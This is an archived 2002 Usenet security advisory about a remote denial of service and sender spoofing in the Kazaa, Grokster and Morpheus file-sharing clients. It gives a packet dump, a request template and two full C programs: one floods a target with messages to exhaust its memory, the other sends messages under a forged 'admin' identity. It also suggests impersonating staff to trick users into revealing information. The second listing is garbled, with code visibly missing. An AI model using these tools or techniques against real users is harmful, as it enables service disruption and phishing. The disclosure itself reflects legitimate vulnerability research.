Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.

Dismiss

Morpheus, Kazaa and Grokster Remote DoS. Also Identity faking vulnerability.

0 views

Skip to first unread message

mrjade 2k2

unread,

Feb 22, 2002, 5:23:19 PM2/22/02

Kazaa, grokster and morpheus remote denial of service. 'P2p' fasttrack's
technology vulnerable. Also identity can be faked in message service.

Summary
---------------------
There's a remote denial of service in fasttrack person-to-person technology,
used by kazaa, grokster and morpheus that can allow an attacker to
crash kazaa's service and also hang the machine.

In the same service, identity can be faked by a malicious attacker to involve
remote user in desired operations.

Version Affected
---------------------
For Denial of service:
kazaa, grokster and morpheus clients for windows version 1.3.3. (not
tested, but any version with client-to-client message feature are vulnerable).
All the software that uses person-to-person technology with message service
support (prior to kazaa 1.5) from fasttrack is vulnerable at this moment.

For indentity faking:
kazaa, grokster and morpheus clients for windows all version to this date,
including updated version of kazaa 1.5.

Denial of service impact
------------------------
Through sending a couple of messages, remote system can be exhausted
because of the consuming of resources.

Explanation
---------------------
I'm going to reffer to kazaa as main target, because is the first that imports
p2p technology from fasttrack.

Kazaa's client opens a pop up window everytime a message is received and
sender username isn't ignored. However, available memory isn't checked at
all, so system will be exhausted when no more RAM can be reserved for
a new pop up window. System out of memory will hang or become unstable
and kazaa's process will crash, lossing all openned downloaded data untill
that moment. Usually a reboot will be needed to restore system.

Kazaa's client uses the HTTP protocol for sending requests betwen users.
All data but download data are sent as tags in the http header, using a very
simple GET request.

For the message request, this can be an example of http header:
(conected to port 1214 on remote host, data is snort result)

02/08-19:10:27.113857 0:E0:4C:E1:22:CD -> 0:4F:49:6:F5:1E type:0x800 len:0x197
192.168.0.3:3337 -> 66.56.77.172:1486 TCP TTL:128 TOS:0x0 ID:30781 DF
***PA* Seq: 0x86CC6D Ack: 0x8BB6E89 Win: 0x2238
47 45 54 20 2F 2E 6D 65 73 73 61 67 65 20 48 54 GET /.message HT
54 50 2F 31 2E 31 0D 0A 48 6F 73 74 3A 20 36 36 TP/1.1..Host: 66
2E 35 36 2E 37 37 2E 31 37 32 3A 31 34 38 36 0D .56.77.172:1486.
0A 55 73 65 72 41 67 65 6E 74 3A 20 4B 61 7A 61 .UserAgent: Kaza
61 43 6C 69 65 6E 74 20 41 75 67 20 32 39 20 32 aClient Aug 29 2
30 30 31 20 31 39 3A 34 32 3A 34 36 0D 0A 58 2D 001 19:42:46..X-
4B 61 7A 61 61 2D 55 73 65 72 6E 61 6D 65 3A 20 Kazaa-Username:
?? ?? ?? ?? ?? ?? 64 0D 0A 58 2D 4B 61 7A 61 61 ???????..X-Kazaa
2D 4E 65 74 77 6F 72 6B 3A 20 3F 3F 3F 0D 0A 58 -Network: ???..X
2D 4B 61 7A 61 61 2D 49 50 3A 20 31 39 32 2E 31 -Kazaa-IP: 192.1
36 38 2E 30 2E 33 3A 31 32 31 34 0D 0A 58 2D 4B 68.0.3:1214..X-K
61 7A 61 61 2D 53 75 70 65 72 6E 6F 64 65 49 50 azaa-SupernodeIP
3A 20 32 30 ?? 2E 32 ?? 38 2E ?? ?? ?? ?? ?? ?? : 20?.21?.2?.17?
3A 31 32 31 34 0D 0A 43 6F 6E 6E 65 63 74 69 6F :1214..Connectio
6E 3A 20 63 6C 6F 73 65 0D 0A 58 2D 4B 61 7A 61 n: close..X-Kaza
61 2D 49 4D 54 6F 3A 20 ?? ?? ?? ?? ?? ?? ?? ?? a-IMTo: ????????
?? ?? 40 4B 61 5A 61 41 0D 0A 58 2D 4B 61 7A 61 ??@KaZaA..X-Kaza
61 2D 49 4D 54 79 70 65 3A 20 75 73 65 72 5F 74 a-IMType: user_t
65 78 74 0D 0A 58 2D 4B 61 7A 61 61 2D 49 4D 44 ext..X-Kazaa-IMD
61 74 61 3A 20 ?? ?? ?? ?? ?? ?? ?? ?? 61 57 35 ata: ???????????
70 63 32 68 70 ?? ?? ?? ?? ?? ?? ?? ?? 49 47 52 ????????????????
76 64 32 35 73 ?? ?? ?? ?? ?? ?? ?? ?? 0D 0A 0D ???????????==...
0A .

In a readable format and completed:

GET /.message HTTP/1.1 | message request.
Host: 192.168.0.3:1214 | remote host ip.
UserAgent: KazaaClient Aug 29 2001 19:42:46 |
X-Kazaa-Username: attacker | Username@Network is attacker.
X-Kazaa-Network: mydomain | kazaa's username. can be faked.
X-Kazaa-IP: 192.168.0.1:1214 | Our ip for client answer
X-Kazaa-SupernodeIP: 20?.21?.2?.17?:1214 |
Connection: close |
X-Kazaa-IMTo: victim@KaZaA | To, it must be victim's username
X-Kazaa-IMType: user_text | or popup wont open.
X-Kazaa-IMData: ???????????????? | Radix 64 encoded message.

Requiered fields for a complete HTTP/1.1 request in order to kazaa accepting
the message are:

Remote's username must be correct to pop up message window, and kazaa's client
will show remote's username on any tcp connection to port 1214 (security matter?).

It's simple to send an amount of HTTP requests to kazaa's clients with diferent
attacker's username and domain to avoid ignoring option. Remote client can be
attacked even if they are not connected to kazaa's network or logged in.

No xploit is needed to do he trick. Just a client of kazaa can do if remote user
isn't able to stop the incoming messages.

Other
---------------------
In fact, kazaa's message sytem can be used for malicious purposes as sender
identity can be easily faked. Using kazaa.com as attacker network and supporting
usernames as admin, security and so, users can be confused to expose relevant
information in private messages.
The response to the message can be cached just listening on port 1214 and decoding
X-Kazaa-IMData using radix64 algorithm.

Solution
---------------------
The vendors have been notified of the problem before the general public helping in
the research for this advisorie. Kazaa version 1.5 can be downloaded and fasttrack
ensure a repaired message service.

As it only affects message system, ignoring all received message is the
fastest and really solution while waiting vendor's solution. So, in the
application menu, tools, options, messages, mark the 'ignore all messages'
check box.

As attacker can modify sender information (username@domain) trying to ignore
all 'attacker''s username is imposible, as it can be radom generated.

Also, for identity faking, no operations are taken. Kazaa's private messages
sometimes must be ignored, considering other ways to contact for administrative
purposes from kazaa, grokster and morpheus staff. For increasing security,
kazaa's username must not be given on any tcp connection but only from
kazaa's supernodes, and a better encryption algorithm is recommended.

Acknowledgements
---------------------
Both bugs discovered my mrjade, are tested and demostration code is available
in this paper.

Contact Information
---------------------
mrj...@softhome.net

This adv is also available at:

http://www.hackindex.org/kazaa.htm

Sources available at:

http://www.hackindex.org/download/kazaa-xploit.c
http://www.hackindex.org/download/kazaa-msg.c

Disclaimer
---------------------
This advisory does not claim to be complete or intended to malicious
purposes. Supplied exploit code is to be used as demostration of bug
or educational purposes only.

This advisory was written for open distribution in unmodified form.
Articles that are based on information from this advisory should include
link or credits note.

credits
----------------------
Thanks to fasttrack staff for supporting and help on researching this,
spanish people in the net.. and people near me, specialy the one who
encourages me.

Demostration code
---------------------

These two programs demostrate both of the security matters in the software.
Kazaa-xploit.c will send a couple of messages to a host/ip using kazaa,
grokster or morpheus software trying to crash it.

Kazaa-msg.c will send a message to a host/ip using kazaa, grokster or
morpheus faking the identity of sender.

/* kazaa-xploit.c code Begin Of File ------------------------------------------
*
* Filename : kazaa-xploit.c
* Version : 0.1
* Coder(s) : mrjade [WkT!] <mrj...@softhome.net>
* Date : 9/2/2K2
* Abstract : Send X messages to any kazaa, grokster and morpheus client
* version 1.3.3 for windows exhausting the system.
*
* Compile: #gcc -o kazaa-xploit kazaa-exploit.c
* Usage: #./kazaa-xploit host/ip nmessages
* Example: #./kazaa-xploit 192.168.0.5 1000
*
* This will send 1000 messages to given kazaa client.
* proof of concept for the same advisorie. Source code
* extracted from kazaa-msg.c program written by mrjade, for
* sending readable messages to any kazaa user.
*
* License conditions:
*
* Copyright (c) 2002 mrjade - <mrj...@softhome.net>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*
* NOTES:
* Improves of this code can generate diferent id@domain names for
* each connection.
*
* For 300mb of RAM 1000 messages will be a good example.
*/

/* ---== Include section ==--- */

#include <netdb.h>
#include <arpa/inet.h>

#include <stdio.h> /* stdout() */
#include <string.h> /* strstr(), strchr() */
#include <malloc.h> /* malloc() */

/* ---== Defines section ==--- */

/* kazaa-head id, dominio, to */
#define kazaa_head "\
GET /.message HTTP/1.1\n\
X-Kazaa-Username: %s\n\
X-Kazaa-Network: %s\n\
X-Kazaa-IMTo: %s\n\
X-Kazaa-IMType: user_text\n\
X-Kazaa-IMData: aaa\n\
\n\n\n"

#define http_basic "GET / HTTP/1.0\nHost: localhost\n\n"
#define id_ "user" /* Default id for sending msg */
#define minetwork "domain.com" /* Default id for sending msg */
#define PORT 1214 /* Default port for sending data */

/* ---== Procedure section ==--- */

/* Usage Banner..*/
void usage(char *pname) {
printf (" :: Usage : %s ip/host n_messages\n", pname);
printf (" :: 1000 for 300mb of RAM aprox.\n", pname);
fflush (stdout);
exit(-1);
}

/* Resolv hostname */

unsigned long resol(char *host) {
struct in_addr addr;
struct hostent *host_ent;

if((addr.s_addr = inet_addr(host)) == -1) {
printf(" :: Resolving host: %s\n", host);
if(!(host_ent = gethostbyname(host))) return(0);
memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length);
} return(addr.s_addr);
}

char *get_token (char *buffer, char *token){
char *stri, *strf;

if ((stri = strstr (buffer, token))){
stri = stri + strlen(token);
strf = strchr (stri, 0xA);
strf[-1]= 0;
} else {
return (NULL);
}
return (stri);
}

/* ---== MAIN Procedure ==--- */

int main(int argc, char *argv[]) {
int sock, c_, cont;
char *host;
struct sockaddr_in TheHoSt;
char *btmp;
char *user_name, *id; /* user_name = id = remote user name */
char *user_net, *network; /* user_net = network = remote user network */
char buffer[512]; /* Rec. buffer*/
int a=0;

printf("\n :: xploit code for kazaa, morpheus and grokster users..");
printf("\n :: (C)2002 mrjade [WkT!] <mrj...@softhome.net>\n");

if( argc < 3) {
usage( argv[0] );
}

/* Host resolv and connect */
host = argv[1];
TheHoSt.sin_family = AF_INET;
TheHoSt.sin_addr.s_addr = resol(host);
if(!TheHoSt.sin_addr.s_addr) {
printf(" :: ERROR: host not found.\n\n");
exit(-1);
}

/* We must get remote user name, need it to send any request */
TheHoSt.sin_port = htons(PORT);
sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock < 0) {
printf(" :: ERROR: Can't open socket\n\n");
exit(-1);
}
bzero(buffer,sizeof(buffer));
if(!connect(sock,(struct sockaddr *)&TheHoSt, sizeof(TheHoSt))) {

printf(" ::\n :: Getting username@network: "); fflush(stdout);

/* Search for username@userdomiain on host */
send(sock,http_basic,strlen(http_basic),0);
recv(sock,buffer,sizeof(buffer),0);
close(sock);

if ((user_net = get_token(buffer, "Network: ")) && \
(user_name = get_token(buffer, "Username: "))){
printf ("%s@%s\n", user_name, user_net);
fflush (stdout);
} else {
printf ("ERR\n :: No username or network detected\n\n");
fflush (stdout);
exit (-1);
}

/* Storing strings */
network = malloc (strlen(user_net)+1);
bzero (network, strlen(user_net)+1);
memcpy (network, user_net, strlen(user_net));

id = malloc (strlen(user_name)+1);
bzero (id, strlen(user_name)+1);
memcpy (id, user_name, strlen(user_name));
} else {
printf(" :: ERR Can't connect.\n\n");
fflush(stdout);
exit (-1);
}

/* number of msg to send*/
cont = strtol (argv[argc-1],0,10);
if (cont < 1){
cont= 1000;
}
printf(" :: Sending %d messages:\n", cont);
fflush(stdout);

/* create HTTP request */
c_ = strlen(kazaa_head)+strlen(id_)+strlen(id)+strlen(minetwork)+3;
btmp = malloc( c_);
bzero(btmp, c_);
sprintf (btmp, kazaa_head, id_, minetwork, id);

/* Bucle */
for (a=0; a < cont; a++){

/* Now send the message request */
sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock < 0) {
printf(" :: ERROR: Can't open socket\n\n");
exit(-1);
}

printf(".");fflush(stdout);
bzero(buffer,sizeof(buffer));
if(!connect(sock,(struct sockaddr *)&TheHoSt, sizeof(TheHoSt))) {
send(sock,btmp,strlen(btmp),0);
recv(sock,buffer,sizeof(buffer),0);
if (strstr(buffer, "200")){ // HTTP OK
printf(".");fflush(stdout);
} else {
printf("\n :: Can't deliver message. \n\n");fflush(stdout);
close(sock);
exit(-1);
}
bzero(buffer,sizeof(buffer)); //Clear Buffer
} else {
close(sock);
printf("\n :: Can't connect. Service down \n\n");
exit(-1);
}
close (sock);
} /* for */
return (0);
}
/* End Of File -----------------------------------------------------------------------*/

/* kazaa-msg.c code Begin Of File ------------------------------------------------------
*
* Filename : kazaa-msg.c
* Version : 0.1
* Coder(s) : mrjade [WkT!] <mrj...@softhome.net>
* Date : 9/2/2K2
* Abstract : Send a message to any kazaa, grokster and morpheus user,
* knowing their ip/hostname. Programmed for hackindex team.
* http://www.hackindex.com
*
* Compile: #gcc -o kazaa-msg kazaa-msg.c
*
* Usage: #./kazaa-msg host/ip message
*
* Example: #./kazaa-msg 192.168.0.5 Hey.. i can send you a message..
*
* This will send a message to given kazaa user (host). Actually this is
* just a proof of concept. requiered fields for send a message are:
*
* X-Kazaa-Username
* X-Kazaa-Network
*
* These will form the "FROM" : name@network
* modify the id_ and minetwork defines to change "FROM" field.
*
* X-Kazaa-IMTo "TO" field. Remote kazaa's login
* (kazaa, grokster, morpheus)
* It's retrieved from a first connection to
* host.
* X-Kazaa-IMType user_text Type of data (fixed)
* X-Kazaa-IMData Message radix64 encoded.
*
* For grokster (tested) and morpheus (not tested) the name of the fields
* in the HTTP header are the same.
*
* If you want to receive any answer from the remote user, you must open
* a tcp socket listening on port 1214. HTTP header will be the same, and
* message must be decoded using Radix64 algorithm.
*
* License conditions:
*
* Copyright (c) 2002 mrjade - <mrj...@softhome.net>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*
*
* Other Copyright:
*
* radix64 encode table and enc64() by Carl M. Ellison *
*
* NOTES:
* Not tested at all.. it my be bugged.
*/

/* ---== Include section ==--- */

#include <netdb.h>
#include <arpa/inet.h>

#include <stdio.h> /* stdout() */
#include <string.h> /* strstr(), strchr() */
#include <malloc.h> /* malloc() */

/* ---== Defines section ==--- */

/* kazaa-head id, dominio, to, msg-radix64 */
#define kazaa_head "\
GET /.message HTTP/1.1\n\
Host: localhost\n\
UserAgent: KazaaClient Aug 29 2001 19:42:46\n\
X-Kazaa-Username: %s\n\
X-Kazaa-Network: %s\n\
Connection: close\n\
X-Kazaa-IMTo: %s\n\
X-Kazaa-IMType: user_text\n\
X-Kazaa-IMData: %s\n\
\n\n\n"

#define http_basic "GET / HTTP/1.0\nHost: localhost\n\n"
#define id_ "admin" /* Default id for sending msg */
#define minetwork "hackindex" /* Default id for sending msg */
#define PORT 1214 /* Default port for sending data */

/* ---== Global variables ==--- */

char enctab[64] = { /* radix64 encoding table */
'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P',
'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f',
'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v',
'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/'
};

/* ---== Procedure section ==--- */

/* Usage Banner..*/
void usage(char *pname) {
printf (" :: Usage : %s ip/host mensaje\n", pname);
fflush (stdout);
exit(-1);
}

/* Resolv hostname */
unsigned long resol(char *host) {
struct in_addr addr;
struct hostent *host_ent;

char *get_token (char *buffer, char *token){
char *stri, *strf;

if ((stri = strstr (buffer, token))){
stri = stri + strlen(token);
strf = strchr (stri, 0xA);
strf[-1]= 0;
} else {
return (NULL);
}
return (stri);
}

void enc64( outbuff, out_lth, polth, inbuff, inb_lth, line_lth, n_space )
char *outbuff ; /* output buffer */
long out_lth ; /* allocated length of the output buffer */
long *polth ; /* actual length of output */
unsigned char *inbuff ; /* input (binary) buffer */
long inb_lth ; /* length of inbuff */
long line_lth ; /* maximum line lth (-1 means infinite) */
long n_space ; /* # spaces at start of each text line */
{
long nl ; /* # chars left in this line */
char *b, *c ; /* walking pointers */

nl = line_lth ;
b = inbuff ;
c = outbuff ;

while ( (inb_lth > 0)
&&(out_lth > 5) ) {
/* encoding */
c[0]=enctab[(b[0]>>2)&0x3f] ;
c[1]=enctab[((b[0]&0x3)<<4)|((b[1]>>4)&0xf)] ;
c[2]=enctab[((b[1]&0xf)<<2)|((b[2]>>6)&0x3)] ;
c[3]=enctab[b[2]&0x3f] ;
out_lth -= 4 ; /* count the code bytes */
switch (inb_lth) { /* take care of the final bytes */
case 1: c[2]='=' ; /* only 1, so == */
case 2: c[3]='=' ; /* 2, so = */
inb_lth = 0 ; /* either way, we're done */
c += 4 ; /* but no spaces */
*(c++) = '\n' ; /* and there's an end of line */
break ;

default:
inb_lth -= 3;
b += 3 ;
c += 4 ;
nl -= 4 ;
if (nl <= 0) {
long i ;
*(c++) = '\n' ;
nl = line_lth ;
for (i=0;i<n_space;i++)
*(c++) = ' ' ;
out_lth -= 1 + n_space ;
}
break ;
} /* switch */
} /* while */
*polth = c - outbuff ;
} /* enc64 */

/* ---== MAIN Procedure ==--- */

printf("\n :: Message sending 4 kazaa, morpheus and grokster users..");
printf("\n :: (C)2002 mrjade [WkT!] <mrj...@softhome.net>\n");

if ((user_net = get_token(buffer, "Network: ")) && (user_name = get_token(buffer, "Username: "))){
printf ("%s@%s\n", user_name, user_net); fflush (stdout);
} else {
printf ("ERR\n :: No username or network detected\n\n"); fflush (stdout);
exit (-1);
}

/* Storing strings */
network = malloc (strlen(user_net)+1);
bzero (network, strlen(user_net)+1);
memcpy (network, user_net, strlen(user_net));

id = malloc (strlen(user_name)+1);
bzero (id, strlen(user_name)+1);
memcpy (id, user_name, strlen(user_name));
} else {
printf(" :: ERROR: Can't connect\n\n"); fflush(stdout);
exit (-1);
}

/* Now send the message request */
sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock < 0) {
printf(" :: ERROR: Can't open socket\n\n");
exit(-1);
}
bzero(buffer,sizeof(buffer));
if(!connect(sock,(struct sockaddr *)&TheHoSt, sizeof(TheHoSt))) {

printf(" :: Sending message to %s from %s@%s\n", id, id_, minetwork);fflush(stdout);

/* Get msg length */
cont=2; c_=0;
while (cont < argc){
c_ = c_ + strlen(argv[cont++])+1;
}

/* Allocate buffer */
msg = malloc (c_);
bzero (msg, c_);

/* Store msg in buffer */
cont=2;
while (cont < argc){
strcat(msg,argv[cont]);
strcat(msg, " ");
cont++;
}
msg[strlen(msg)]=0;

/* Output buffer for radix64 conv */
msgr64 = malloc (2*c_);
bzero (msgr64, 2*c_);

/* Convert msg to radix 64 */
enc64( msgr64, 2*c_, &olth, msg, c_, 9999, 0 );

/* Store in buffer */
c_ = strlen (msgr64)+strlen(kazaa_head)+strlen(id_)+strlen(id)+strlen(minetwork)+3;
btmp = malloc(c_);
bzero(btmp, c_);
sprintf (btmp, kazaa_head, id_, minetwork, id, msgr64);
send(sock,btmp,strlen(btmp),0);
while ((recv(sock,buffer,sizeof(buffer),0)!=-1) && (buffer[0] !=0)){
if (strstr(buffer, "200")){ // HTTP OK
printf(" :: Message sent.\n\n");
close(sock);
exit(0);
}
bzero(buffer,sizeof(buffer)); //Clear Buffer
}

printf(" :: Can't deliver message\n\n\n\n");
} else {
close(sock);
printf(" :: Can't connect. Service unavailable.\n\n");
exit(-1);
}
close(sock); //Remote host will close it when finished
return (-1);
}

/* End Of File ----------------------------------------------------------------------------*/

0 new messages